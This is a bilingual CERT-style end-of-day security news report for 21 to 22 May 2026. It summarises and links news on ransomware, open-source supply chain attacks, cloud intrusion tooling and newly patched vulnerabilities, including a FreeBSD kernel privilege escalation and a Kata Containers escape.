End-of-Day report
Timeframe: Donnerstag 21-05-2026 18:00 - Freitag 22-05-2026 18:00
Handler: Guenes Holler
Co-Handler: Michael Schlagenhaufer
News
Qilin-Ransomware nutzt Initial Access aus ZipLine-Kampagne - DACH-Recruiting-Domains im Fokus
Wir haben Hinweise darauf, dass die Ransomware-Gruppe Qilin Initial Access von Akteur:innen der ZipLine-Phishing-Kampagne erwirbt und für eigene Verschlüsselungs- und Erpressungsoperationen weiterverwendet. In Österreich liegen uns bereits bestätigte Fälle vor. [..] Im DACH-Raum sehen wir aktuell vor allem Köderdomains mit Recruiting-Bezug.
https://www.cert.at/de/aktuelles/2026/5/zipline-qilin-raas
A hacker group is poisoning open source code at an unprecedented scale
GitHub is just the latest victim of TeamPCP, a gang that has carried out a spree of software supply chain attacks. [..] Amid an epidemic of supply chain attacks like the ones TeamPCP has unleashed, Socket-s Burckhardt says open-source users will need to take trust-but-verify measures, like analyzing updates for malware before rolling them out across a network, as well as the kind of -cool-down- period that Read recommends before downloading and running code.
https://arstechnica.com/information-technology/2026/05/a-hacker-group-is-poisoning-open-source-code-at-an-unprecedented-scale/
Megalodon: Mass GitHub Repo Backdooring via CI Workflows
On May 18, 2026, an automated campaign codenamed megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in a six-hour window. [..] 5,700+ commits in six hours, 5,561 repositories, one payload: replace a GitHub Actions workflow with a dormant secret exfiltration backdoor. The workflow_dispatch trigger design means these backdoors sit silent until activated, creating no visible CI runs.
https://safedep.io/megalodon-mass-github-repo-backdooring-ci-workflows
Drupal: Critical SQL injection flaw now targeted in attacks
Drupal is warning that hackers are attempting to exploit a "highly critical" SQL injection vulnerability announced earlier this week.
https://www.bleepingcomputer.com/news/security/drupal-critical-sql-injection-flaw-now-targeted-in-attacks/
Google API keys keep working after you delete them long enough to be exploited
When you delete a Google API key, it says it-s immediately deleted. Our testing says ~23 minutes. During that window, an attacker with a leaked key keeps access to your data and enabled APIs (including Gemini). You have no way to revoke it faster or confirm when it stops working. Google closed our report as -won-t fix-.
https://www.aikido.dev/blog/google-api-keys-deletion
Paved With Intent: ROADtools and Nation-State Tactics in the Cloud
Open-source framework ROADtools is being misused by threat actors for cloud intrusions. [..] ROADtools is an open-source framework written in Python and built for red-teaming and research. It primarily targets the identity and authentication layers of Azure, and focuses on how accounts, applications and tokens operate in tenants.
https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/
CISA to allow researchers to report vulnerabilities to exploited bugs catalog
The Cybersecurity and Infrastructure Security Agency (CISA) announced the creation of a nomination form on Thursday that they said enables -researchers, vendors, and industry partners- to report bugs that need to be added to the Known Exploited Vulnerabilities catalog.
https://therecord.media/cisa-to-allow-researchers-to-report-vulnerabilities-kev
Vulnerabilities
Ubiquiti patches three max severity UniFi OS vulnerabilities
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in Unify OS that can be exploited by remote attackers without privileges. [..]
https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/
Trend Micro Apex One und Langflow: Warnung vor Angriffen
Die unter Beschuss stehende Schwachstelle in Trend Micros Apex One schließen die Updates aus dem Mai, die der Hersteller am Donnerstag dieser Woche veröffentlicht hat. [..] In Langflow handelt es sich um eine verkettete Schwachstelle, die die Übernahme von Konten und das Ausführen von Schadcode aus dem Netz ermöglicht.
https://www.heise.de/news/Schwachstellen-in-Trend-Micro-Apex-One-und-Langflow-unter-Beschuss-11303311.html
Notepad++: Update bessert Schwachstelle im Installer aus
Notepad++ schließt in der neuen Version 8.9.6 eine Sicherheitslücke im Installer. Die Risikobewertung ist noch nicht eindeutig, ein aufgeführter CVE-Eintrag noch nicht veröffentlicht.
https://www.heise.de/news/Notepad-Update-bessert-Schwachstelle-im-Installer-aus-11303525.html
FatGid - FreeBSD 14.x kernel LPE
A kernel stack buffer overflow exists in the setcred(2) system call introduced in FreeBSD 14.x. The overflow occurs before any privilege check, allowing any unprivileged local user to trigger arbitrary behaviour ranging from a kernel panic to full local privilege escalation. [..] The FreeBSD Security Team published FreeBSD-SA-26:18.setcred on 2026-05-21 with the assigned identifier CVE-2026-45250. Patches landed across all supported branches on 2026-05-20.
https://fatgid.io/
LWN: Security updates for Friday
https://lwn.net/Articles/1074040/
Tenable: [R1] Sensor Proxy Version 1.4.0 Fixes Multiple Vulnerabilities
https://www.tenable.com/security/tns-2026-15
Openwall: CVE-2026-47243: Kata Containers guest-root to host-root escape via virtiofs
https://www.openwall.com/lists/oss-security/2026/05/21/14